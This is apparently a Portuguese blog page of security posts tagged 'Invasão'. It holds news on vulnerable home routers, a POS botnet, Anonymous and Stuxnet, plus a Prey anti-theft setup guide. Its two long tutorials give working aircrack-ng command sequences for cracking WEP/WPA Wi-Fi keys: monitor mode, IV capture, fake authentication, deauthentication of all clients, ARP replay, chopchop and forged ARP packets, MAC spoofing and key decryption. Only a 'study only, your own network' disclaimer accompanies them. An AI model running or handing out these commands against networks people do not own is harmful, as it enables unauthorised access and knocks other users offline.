Posts com Tag ‘Invasão’

..: Invasão de Roteadores? :..

Publicado: 4 de março de 2015 em Diversos
Tags:, , , , ,

De acordo com a empresa americana Nomimum, cerca de meio milhão de roteadores no Brasil possuem brechas para ataques de negação de serviço (DDoS). As informações vieram de um estudo que a companhia de segurança de redes fez sobre ataques baseados em DNS, voltado especialmente para roteadores domésticos em situação vulnerável.

Na America Latina o número sobe para 2,83 milhões. O levantamento estima ainda que no mundo há mais de mais de 24 milhões de roteadores com proxies de DNS abertos, expondo as conexões a ataques DDoS. Isso torna esse sistema o alvo mais popular para investidas mal-intencionadas, com amplificadores mais disponíveis que os quatro outros protocolos existentes juntos.

roteador_Cadeado

Sobre as consequências

Roteadores domésticos em estado vulnerável dificultam que os provedores de internet identifiquem quem é o autor dos ataques e de onde ele está operando. Os ataques por amplificação de DNS estão cada vez mais comuns. Mesmo necessitando de pouca habilidade ou esforço por parte dos hackers, eles causam danos enormes.

Esses danos geram prejuízos de rede, custos, receita e de reputação. De rede porque o tráfego mal-intencionado consome muito da banda disponível. De custos porque há um grande aumento nas chamadas de suporte técnico quando o serviço é interrompido. De receita porque a experiência insatisfatória do usuário faz a rotatividade e as despesas da empresa provedora aumentarem na tentativa de manter o cliente. E de reputação porque muito do tráfego indesejado é direcionado a concorrentes.

Em fevereiro, mais de 5,3 milhões desses roteadores foram utilizados para gerar tráfego de ataque em um único dia. O tráfego de amplificação corresponde a trilhões de bytes por dia causando interrupção nas redes de provedores, sites e indivíduos.

A consultoria de segurança IntelCrawler emitiu um alerta global sobre uma nova rede de zumbis composta por terminais POS, as populares “maquininhas de cartão.

virus_no_pcA operação criminosa infectou cerca de 1.500 terminais de pontos de venda (POS), ferramentas de gestão contábil para varejo e de back-office. Foram 36 países afetados, incluindo EUA, Brasil, Portugal, Espanha, Reino Unido, China e Rússia.

Apelidada de Nemanja, a botnet está baseada na Sérvia e foi idealizada para trabalhar em múltiplas plataformas, maximizando o potencial de infecção.

A IntelCrawler identificou pelo menos 25 diferentes programas usados nesses sistemas. Uma lista dos sistemas pode ser encontrada no blog da empresa.

Além da capacidade de recolher dados de cartão de crédito, o malware pode gravar as informações inseridas pelo teclado e contidas nos cartões, como senhas e credenciais. Com essas informações, os criminosos podem atacar as finanças pessoais dos usuários.ZombieKidcolored-1

Segundo a consultoria, a expectativa é de que os ataques a sistemas de gerenciamento do varejo cresçam exponencialmente, em especial pela conectividade constante dos terminais, que facilitam a captura das máquinas em redes zumbis, sob o controle de cibercriminosos.

lad1Pois bem… esses dias, um amigo de trabalho teve um notebook roubado de dentro do carro da empresa: enquanto ele atendia um cliente, forçaram a porta do carro e levaram a mochila com o notebook dentro… azar? Pode ser… mas tem solução? Infelizmente não, neste caso não. Por outro lado, existe a possibilidade da preventiva quanto a este tipo de problema, e um software que cumpre o papel é o Prey, aplicativo GRÁTIS com suporte nos principais sistemas operacionais (Windows/Linux/Mac e Android) que permite o rastreio de notebooks (e PCs, porque não?) SEM a necessidade de ter um GPS na máquina, bastando uma conexão com a internet.

ATENÇÃO!!

Eu disse “principais sistemas operacionais” e também disse “rastreio de PCs e Notebooks”, porém, seu celular/tablet/phablet com ANDROID também tem suporte, mas falarei disso em outro post!!

Pra quem ainda não conhece, o Prey é, simplesmente, um dos aplicativos antifurto (anti-theft) mais famosos do mercado, e bem simples de ser usado: faça download dele no Portal Prey Project, e siga os passos abaixo:

type_preyNew Users:

Para criar uma nova conta no Prey e tornar o “monitoramento” possível, após abrir o instalador e iniciar o “Setup Prey Account”, marque a opção “New user” e clique em “Next”. Você irá criar uma conta no Prey com seu Nome, Endereço de Email, Senha, Nome do Dispositivo e Tipo (estou instalando em um Notebook, então vou escolher a opção “Laptop”).

Lembre-se: O programa vai enviar dados de rastreio para o seu endereço de email, ou seja, USE UM ENDEREÇO DE EMAIL VÁLIDO!!!

– Depois de instalado, #partiu configurar o programa… abra o “Configure Prey”, escolha a opção “Manage Prey settings” e habilite o “wifi autoconect”… esta opção irá permitir por padrão que o seu computador se conecte automaticamente ao access point mais próximo, quando não houver conexões disponíveis.

Habilite também o “Enable guest account”… esta opção irá permitir que usuários acessem seu computador sem usar uma senha… pode parecer perigoso, mas é a isca perfeita para se conseguir informações úteis sobre quem pegou o seu aparelho.

Depois de marcar tudo, clique em “Apply” para aplicar as alterações.

Configurações DO COMPUTADOR feitas, vamos configurar o programa:

Abra o Portal Prey (use seu navegador preferido e acesse http://panel.preyproject.com … e entre com a sua conta.

Não vou citar item por item do que deve ou não ser marcado, pois o sistema é bem intuitivo… marque as opções e não se esqueça de clicar para Salvar as Alterações.

Depois de tudo salvo, se quiser descobrir se ficou realmente seguro, faça o teste… empreste seu notebook pra alguém e com outro PC acesse o portal Prey com a sua conta… no menu Principal, tem a opção “Ok … Missing” … coloque a chavinha em “Missing” e comece a receber relatórios de 10 em 10 minutos (eu configurei assim)… o relatório, fotos e informações poderão ser impressos e usados pela polícia, caso o seu computador não apareça antes…

lad4

Dica: Windows XP, Vista e 7 conectam na internet apenas depois de feito o login. O Windows 8 se conecta antes, tanto via cabo quanto via Wifi, ou seja, compensa atualizar o sistema.. Quanto ao Mac, eu nem preciso falar nada, pois acho muito difícil existir no mundo um ladrão que saiba formatar (ou mesmo usar) um Mac rsrs e ele também costuma conectar antes do login… idem pra maioria dos Linux (Ubuntu incluso aqui)…  Alguém perdeu um notebook aí?lad3

Cracker PasswordQuem nunca se perguntou se tem uma senha segura de WiFi? … ops… será que existe uma senha realmente segura? Nesse tutorial, vou ensinar como capturar e descriptografar senhas wireless. Use em SUA rede, para saber se sua senha realmente é segura… lembre-se: Roubar internet do vizinho é crime! Todo o material aqui constante, serve APENAS para estudo!!!.

Para snifar, capturar e descriptografar as senhas vamos utilizar o pacote Aircrack (aircrack-ng, airomon-ng e airodump-ng). O Aircrack é um pacote de ferramentas muito poderoso para realizar ataques a redes Wireless.

Levando em consideração que você já tem um Linux instalado (aqui estou usando o Mint) em SEU NOTEBOOK, vamos começar:

Se estiver conectado em qualquer rede WiFi, desconecte-se.

Os comandos serão dados no terminal, ou seja, via linha de comando e a grande maioria deles exige logon como Root portanto, pra não ter que ficar digitando a sua senha a todo momento, abra o terminal que você vai usar e, logo de cara, digite: # sudo su

Agora vamos ao que interessa:

Primeiramente iremos colocar a interface de rede em modo Monitor, para capturar nossos pacotes. O comando é:

airmon-ng start wlan0

Após executar este comando, será criada uma interface de rede com a nomenclatura “mon0”, que irá capturar todos os pacotes que precisamos para descriptografar a senha wep ou wpa.

  • Agora iremos escanear todas as redes disponíveis;

Com o comando a seguir iremos ver todas os dispositivos de rede sem fio ao alcance da nossa interface de rede. É possível também ver os mac-address que estão conectados a um determinado dispositivo, assim, é preciso anotar os seguintes dados sobre o nosso alvo:

  • BSSID
  • CANAL
  • CIPHER
  • AUTH
  • ESSID

É preciso também anotar um MAC-ADDRESS que esteja conectado ao alvo escolhido.

airodump-ng mon0

Hora de capturar os vetores de inicialização. No comando a serguir, iremos capturar pacotes IVS que trafegam na rede. O nome do arquivo a ser gerado é você quem define, e o canal é o canal do alvo que você definiu.

airdump-ng –ivs -w captura-ivs -c 6 mon0

Explicando o comando:

  • -i = Captura apenas pacotes que contenham Ivs (–ivs);
  • -w = Nome do arquivo que será gerado com os dados capturados;
  • -c = Canal do Access Point;
  • mon0 = interface de rede em modo monitoramento.

Agora iremos enviar um pedido de falsa autenticação com um MAC associado ao acces point que queremos quebrar a senha, por exemplo:

aireplay-ng -1 0 -e NOME_DA_REDE -a MAC_ROTEADOR -h MAC_USUÁRIO mon0

  • -1 = Essa opção enviao a autenticação falsa;
  • 0 = Aqui é o tempo para reassociação, em segundos
  • -e = ESSID do alvo, ou seja, o nome do Access Point
  • -a = Mac-Address do Access Point alvo
  • -h = Mac-Address de alguém que esteja conectado (associado) ao access Point
  • mon0 = interface de rede em modo monitor.

Feito isso, aguarde que os vetores sejam capturados. Para acelerar o processo de captura de IVS, podemos tentar enviar um Arp request para a rede, na tentativa que alguma maquina receba e comece a enviar arp replay para nós. Isso fará com que o tráfego de dados aumente rapidamente:

Enviando Arp request para a rede:

aireplay-ng -3 -b 00:13:46:18:c9:58 -h 00:1f:3b:92:d1:df mon0

  • -3 = Opção para arp request;
  • -b = Mac-Address do Access Point alvo
  • -h = Mac-Address associado ao Access Point, no nosso caso o mac que identificamos como conectado ao AP “rede-segura”
  • mon0 = interface de rede em modo monitor.

Após alguns minutos de captura de pacotes (lembrar que só é possível capturar pacotes se tivermos pessoas trafego de dados na rede) iremos analisar o arquivos gerado e tentar extrair a senha do Dispositivo.

aircrack-ng -a 1 capturar-ivs-redesegura

  • a = Modo para forçar o ataque
  • -1 = wep (se fosse WPA usaríamos o -2)

Aqui iremos selecionar a nossa rede alvo, pois os dados foram capturados por canal, assim todos as redes que estão no canal “6” entram no aquivo.

Feito isso, a senha literalmente cairá no seu colo.WallPaper do tema pra vc ;-)

Frase do dia:

A prática Hacker deve ser sempre exercida de forma ética, e nunca para prejudicar, furtar, ou sacanear ninguém. É importante saber que existem várias outras formas de capturar senhas, essa é apenas uma.

É importante lembrar, também, que da mesma forma que você quebrou a senha, é possível descobrir quem está conectado à ela, ou seja, use este artigo para aprendizado apenas.

Fonte: TecMundo

O notório grupo de hackers identificado como Anonymous pretende interromper as atividades de toda a internet no próximo sábado (31 de março). O ato seria uma forma de protestar contra projetos como o SOPA e se posicionar contra os “líderes mundiais irresponsáveis e os bancários que estão arruinando o mundo enquanto satisfazem seus desejos egoístas”.

Um documento publicado no site Pastebin, supostamente escrito por membros da coligação hacker, afirma que a intenção não é matar a rede mundial de computadores, mas sim atacar as grandes corporações, de maneira que provoque a maior quantidade possível de danos. A Operação Blecaute 2012 pretende atacar os servidores DNS que servem como base para o funcionamento da internet, o que tornaria a maior parte dos sites inacessíveis.

A ação faz parte da operação “Março Negro”, que prometia um mês inteiro de protestos contra propostas como o SOPA, ACTA e o PIPA. Embora até o momento o grupo não tenha realizado nenhuma grande ação durante este mês, a derrubada de toda a internet deve ser o suficiente para chamar a atenção das autoridades.

A opinião dos especialistas em segurança:

Caso você esteja preocupado e já esteja começando a pensar em quais atividades realizar no próximo fim de semana, procure se acalmar. Empresas especializadas em segurança virtual afirmam que um ataque do tipo não teria as consequências esperadas, e é muito provável que o blecaute prometido não aconteça.

“Os hackers do Anonymous podem causar interrupções, mas elas vão ficar restritas às redes das quais as máquinas visadas fazem parte”, afirma Robert Graham, da Errata Security. “É improvável que eles consigam tirar todas elas do ar, ao menos por um período significativo de tempo. No dia do Blecaute Global, é possível que muitas pessoas nem notem o que está acontecendo”, complementa.

Apesar de estar certo da ineficiência de um ataque do tipo, Graham mostra certa cautela ao falar sobre o assunto. “Só porque eu digo que o Anonymous não pode derrubar a internet, não significa que isso não pode ser feito”, afirma o especialista em segurança no blog oficial da empresa.

Vírus já invadiu computadores de automatização industrial em vários países! Saiba agora como ele age.

Matéria publicada pela TecMundo

Esqueça grande parte do que você sabe sobre vírus de computadores, pois este que estamos tratando agora vai muito mais além. Recentemente foi descoberto um novo tipo de praga que está fazendo com que muitos programadores da Microsoft percam seus cabelos (e possivelmente seus empregos, em alguns casos).

Explorando uma falha bastante grave do sistema operacional Windows, o worm (tipo de praga virtual que funciona de maneira similar aos vírus, mas é autorreplicante) não parece possuir pretensões de atacar computadores domésticos, mas está causando estragos sérios a indústrias de vários países.

Você precisa saber quem está por trás

O que ele faz?

O Stuxnet é um programa malicioso que atacou, até agora, apenas sistemas de controle industrial da marca Siemens (SCADA). O problema é que estes sistemas são utilizados por muitas indústrias, inclusive indústrias nucleares. O que as pesquisas disseram até agora é que ele se espalha por meio de pendrives infectados, devido à falha no Windows que ainda não foi solucionada.

Atacando estes sistemas de controle industrial (que utilizam o Windows), o Stuxnet realiza uma ponte entre o computador invadido e um servidor remoto, que é para onde vão todas as informações roubadas pelo worm. Neste processo são capturados projetos de pesquisa e relatórios, além de permitir o acesso remoto às configurações do sistema SCADA.

Diagrama de funcionamento do sistema SCADA

Fonte: Siemens

Este sistema SCADA é o que permite que fábricas utilizadores de sistemas automatizados possam ser controladas sem a presença de humanos em todos os locais das linhas de produção. Amplamente empregados, podem ser encontrados desde em pequenas fábricas de gêneros alimentícios até em usinas de produção energética (o grande perigo).

Quando foi detectado?

A primeira vez em que foram divulgados relatos sobre infecções causadas pelo Stuxnet foi em junho deste ano, forçando a Microsoft a lançar correções para o sistema operacional e ao que tudo indica, esta versão dele foi criada em março (mas relatórios da Microsoft afirmam que ele já existe desde janeiro).

Possibilidades de controle SCADA

Fonte: Siemens

Em setembro foi lançado o segundo pacote de atualizações do Windows para tentar corrigir as falhas, mas mesmo assim ainda há brechas para que o worm consiga invadir os sistemas SCADA para capturar informações.

Onde ele já agiu?

Além da indústria nuclear iraniana, o Stuxnet também já foi detectado em milhões de computadores chineses, milhares de computadores na Índia, Indonésia, Estados Unidos, Austrália, Inglaterra e Paquistão. Números não oficiais também apontam para infecções na Alemanha e outros países na Europa.

Uma bomba está sendo armada na internet

Quem está por trás?

Esta é a questão mais complicada de todas, pois até agora não surgiram informações concretas sobre quem é o responsável pelos ataques. O que se sabe é que o – provavelmente – grupo fez um trabalho profissional, pois a ação exigiu conhecimento profundo em vários campos de ciências que crackers domésticos não poderiam possuir.

Há quem diga que se trata de um ataque financiado por algum governo. Por ter atingido computadores de uma planta do reator nuclear Bushehr, alguns especulam que o grupo de crackers seja composto ou financiado por israelenses, mas estas denúncias ainda são apenas especulações.

Uma falha no Windows é o grande vilão

Para membros de alto escalão de agências de espionagem e contraespionagem, como a britânica, isso faz parte dos primeiros ataques comprovados de uma guerra cibernética. Seria o conflito mais desleal já visto, porque ao contrário do que acontece normalmente em batalhas, nesse caso não há informações concretas sobre quem são os inimigos.

Quais os objetivos?

Por ter atingido vários países em todo o mundo, mas ter causado danos singulares no Irã, suspeita-se que o grupo criador do Stuxnet tenha objetivos de sabotar todo o programa nuclear iraniano. Independente de quais tenham sido os objetivos, os resultados das infecções foram inéditos e merecem atenção.

Foi a primeira vez que malwares foram responsáveis por danos em escala “terrorista”. Nos anos 90 os crackers foram acusados de muitos ataques para destruição de dados e danificação de sistemas domésticos; nos anos 2000 os objetivos eram mais audaciosos, como desviar dinheiro e invadir contas; agora já começa a se falar em “cyberterrorismo”.

Os resultados podem ser horríveis

E agora, quem irá nos defender?

Leia mais em: http://www.tecmundo.com.br/5878-stuxnet-o-virus-da-pesada.htm#ixzz1oIXjXNBd

Hoje em dia, quem não tem uma conexão Wifi disponível? Pois é… com o crescente aumento nas vendas de notebooks e consequente aumento de roteadores, torna-se cada vez mais necessária a utilização de senhas fortes, bons firewalls e outros métodos de segurança para ninguém “roubar” sua internet… e por falar nisso, vou mostrar como é possível quebrar redes, mesmo com segurança WEP e WPA1 utilizando Linux.

Começando

Pra quem nunca viu ou tem curiosidade de aprender um pouco mais sobre segurança em redes, recomendo que pesquisem bastante, tanto no google, quanto em livros especializados. Um bom livro é o “Segurança e Auditoria da Tecnologia da Informação”, de Cláudia Dias.

Vamos à ação rsrs…

Todo arquivo de captura de pacotes deve ter a extensão .cap ou .ivs.

Instale o aircrack-ng. Como uso uma versão com base em Debian, vou usar o apt-get pra instalar o pacote… caso você não ache em seu gerenciador de pacotes, pode baixar o prog no site http:\\www.aircrack-ng.org e instalar manualmente (dúvidas pra instalar? O google tira todas! 😉

Capturando os Pacotes

AIRMON-NG (vem instalado com o aircrack-ng) – é a ferramenta para colocarmos nossa placa de rede wireless no estado monitor. Antes de começar a capturar pacotes da rede, devemos utilizar esta ferramenta em modo root ou adm. A linha de execução é:

airmon-ng <start|stop> <interface> [channel]

onde <start|stop> inicia ou pára de monitorar; <interface> é a sua interface de rede, por exemplo: eth0, raw0, ath0, etc.; e [chanell] é o canal que sua placa de rede wireless irá trabalhar.

Feito isso, com sua placa de rede monitorando a rede wireless disponível, vamos para a captura dos pacotes transmitidos pelo protocolo 802.11.  Lembrando que todas as ferramentas vêm instaladas com o aircrack-ng, vamos agora utilizar a ferramenta AIRODUMP-NG.

A finalidade desta ferramenta é capturar e coletar ivs (Initialization Vectors) dos pacotes WEP. Estes são os pacotes que usaremos com o AIRCRACK-NG pra descobrir a chave que a WEP está usando.

INTERESSANTE: se você tiver um receptor GPS em seu computador, o airodump-ng irá mostrar as coordenadas do Access Point que você está coletando os pacotes.

O airodump também deve ser usado como root:

airodump-ng <options> <interfaces>

Lembrando que <interfaces> é a sua interface de rede, as <options> são:

  •  -ivs: captura somente os pacotes ivs;
  •  –gpsd: usa um dispositivo GPS, caso o tenha;
  •  –write: cria um arquivo com o nome escolhido e com a extensão .cap ou .ivs e começa a capturar;
  •  –beacons: guarda os beacons (não é guardado por padrão);
  •  –channel: especifica um canal para a captura;
  •  -a: captura na frequência de 5Ghz específica da banda A;
  •  –abg: captura tanto em frequências de 5Ghz quanto nas de 2,4Ghz.

Por padrão, o airodump-ng captura os pacotes da frequência 2.4Ghz.

Capturando e escrevendo no arquivo teste.ivs, no channel 11, nas frequências entre 2.4 e 5Ghz, com a interface da placa ath0:

# airodump-ng –ivs -write teste.ivs -c 11 –abg ath0

Captura de pacotes com o arquivo teste.cap, com as mesmas configs acima:

# airodump-ng –ivs -write teste.cap -c 11 -abg ath0

O programa airodump-ng oscila entre WEP e WAP1. Quando sua placa não rejeita pacotes corrompidos, o airodump-ng mostra isso no terminal:

Pra entender melhor:

Atacando a rede Wireless

Depois de capturar os pacotes, o próximo passo é atacar a rede com a ferramenta AIREPLAY-NG.

Existem maneiras diferentes de utilizar o programa classificadas da seguinte forma:

  • 0: Desautenticação;
  • 1: Autenticação falsa;
  • 2: Seleção interativa do pacote a enviar;
  • 3: Reinjeção ARP;
  • 4: “Chopchop” de KoreK (predicção de CRC).

Ataque Zero:

O ataque Zero, desautentica um usuário conectado ao Access Point e conecta novamente, fazendo uma nova requisição ARP e envia um novo handshake. Neste ataque, podemos:

Capturar HandShake WPA:

# aireplay-ng -0 5 -a <MAC do Access Point> -c <MAC do Client> <interface> – Reinjeção ARP (ataque 3)

# aireplay-ng -0 10 -a <Mac do Access Point> <interface> – faz todos os usuários conectados caírem para nova requisição ARP

# aireplay-ng -3 -b <MAC do Access Point> -h <MAC do Client> <interface> – reinjeção dos pacotes

Rejeitar que o cliente se conecte:

# aireplay-ng -0 0 -a <Mac do Access Point> <interface> para todos conectados no Access Point, e

# aireplay-ng -0 0 -a <Mac do Access Point> -c <MAC do Client> <interface>  para um client específico.

Ataque Um:

Este ataque funciona com êxito quando um cliente está conectado ao Access Point. Caso não tenha ou não saiba, faremos uma client para conectar a esse AccessPoint. Lembre-se sempre que é melhor ter um client conectado, pois assim iremos gerar tráfego ARP.

Vamos mudar o nosso MAC:

# ifconfig <interface> down
# ifconfig <interface> hw ether 00:11:22:33:44:55
# ifconfig <interface> up

Ataque:

# aireplay-ng -1 0 -e SeuESSID -a <MAC do Access Point> -h 00:11:22:33:44:55 <interface>

Se der certo, vai aparecer algo assim:

03:12:04 Sending Authentication Request
03:12:04 Authentication successfull
03:12:04 Sending Association Request
03:12:05 Association successfull

Como alguns Access Point podem requerer autenticação de tantos em tantos segundos, o aireplay-ng consegue fazer isso da seguinte maneira:

# aireplay-ng -1 <Qtd de Segundos> -e <Seu ESSID Falso> -a <MAC do Access Point> -h 00:11:22:33:44:55 <interface>

Caso este ataque não seja bem sucedido (o aireplay continua enviando pacotes de pedido de autenticação), pode ser que esteja usando filtro de MAC Address. Verifique o seguinte também:

  1. Está com o controlador corretamente instalado e com os patches devidamente aplicados?
  2. A placa wireless está configurada no mesmo canal que o Access Point?
  3. O BSSID e o ESSID (opções -a / -e) são as corretas? Se for Prism2, verifique se o firmware está atualizado.

Algumas placas de rede só suportam associar e injetar/monitorar através da interface Xraw, por isso, talvez você precise fazer:

# ifconfig <interface> down hw ether 00:11:22:33:44:55
#ifconfig <interface> mode Managed essid ‘the ssid’ key AAAAAAAAAA
#ifconfig <interface> up

#sysctl -w dev.<interface>.rawdev=1 (cria o <interface> Xraw)
#ifconfig <interface>raw up
#airodump-ng <interface>raw out 6

Só então, você poderá usar os ATAQUES 3 e 4 (o aireplay-ng substitui o <interface> pelo <interface>raw que criamos caso sua placa precise).

# aireplay-ng -3 -h 00:11:22:33:44:55 -b <MAC do Access Point> <interface> (ATAQUE 3)
# aireplay-ng -4 -h 00:10:20:30:40:50 -f1 <interface> (ATAQUE 4)

Ataque Dois:

Este ataque seleciona um pacote qualquer, inverte as posições dos MAC do Access Point e do Client, causando conflito e forçando o reinício, e faz a reinjeção:

# aireplay-ng -2 -b <MAC do Access Point> -n 100 -p 0841 -h <MAC do Client> -c <MAC do Access Point> <interface>

Ataque Três:

O famoso ataque de reinjeção de requisição ARP é o mais efetivo para gerar ivs. Este ataque requer um endereço MAC de um cliente associado ou um MAC falso como montamos no Ataque 1, porém, este ataque pode demorar bastante e precisa de tráfego.

Como usamos no Ataque 1:

# aireplay-ng -3 -h 00:11:22:33:44:55 -b <MAC do Access Point> <interface>

Aparecerá o seguinte:

Saving ARP request in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets…

Ataque Quatro:

Ataque nomeado “ChopChop” de KoreK, quando bem sucedido é ótimo pois desencripta um pacote WEP sem conhecer a sua chave e pode usar uma WEP dinâmica.

Este ataque não recupera a chave WEP, apenas revela em texto plano. Alguns Access Point não são tão vulneráveis assim, outros, parecem até mais vulneráveis por jogarem os pacotes menores que 60bytes. O aireplay-ng consegue adivinhar o resto dos pacotes menores que 42bytes que são jogados pelos Access Point.

Primeiro, desencriptamos um pacote:

#aireplay-ng -4 <interface>

Se não funcionar é porque o AccessPoint precisa de um MAC específico filtrado nele. Assim, temos que usar um MAC de um cliente conectado:

#aireplay-ng -4 -h <MAC do Client> <interface>

Segundo, o IP:

#tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap

Aparecerá algo assim:

reading from file replay_dec-0627-022301.cap, link-type […]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

Agora, forjamos uma requisição ARP:

# arpforge-ng replay_dec-0627-022301.xor 1 <MAC do CLient> <MAC do Access Point> 192.168.1.100 192.168.1.2 arp.cap

A faixa de IP inicial (192.168.1.100) não importa, mas sim a de destino (192.168.1.2).

Reenviando o ARP forjado:

# aireplay-ng -2 -r arp.cap ath0

Desencriptando as Chaves dos Pacotes Capturados

Para desencriptar as chaves, vamos usar a ferramenta AIRDECAP-NG. Ela serve tanto para chaves WEP quanto para WPA1, que foram capturadas no arquivo.cap.

airdecap-ng [opções]

# airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap
# airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap
# airdecap-ng -e ‘the ssid’ -p passphrase tkip.cap

Em outro post, vou mostrar a forma mais simples de se defender deste tipo de ataque/invasão…